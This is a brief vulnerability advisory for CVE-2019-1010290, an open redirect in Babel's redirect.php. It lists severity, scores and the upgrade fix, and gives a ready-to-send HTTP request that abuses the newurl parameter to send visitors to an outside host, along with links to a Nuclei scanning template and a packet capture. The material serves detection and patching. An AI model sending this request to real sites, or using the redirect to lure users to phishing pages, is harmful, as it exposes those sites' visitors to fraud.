| Title | Babel - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. |
| Remediation | Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.21947 |
| CVE ID | CVE-2019-1010290 |
| CWE ID | CWE-601 |
| Tags | cve2019 cve redirect babel cmsmadesimple vuln |
Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
GET /modules/babel/redirect.php?newurl=http://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-1010290.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-1010290.pcap
N/AN/A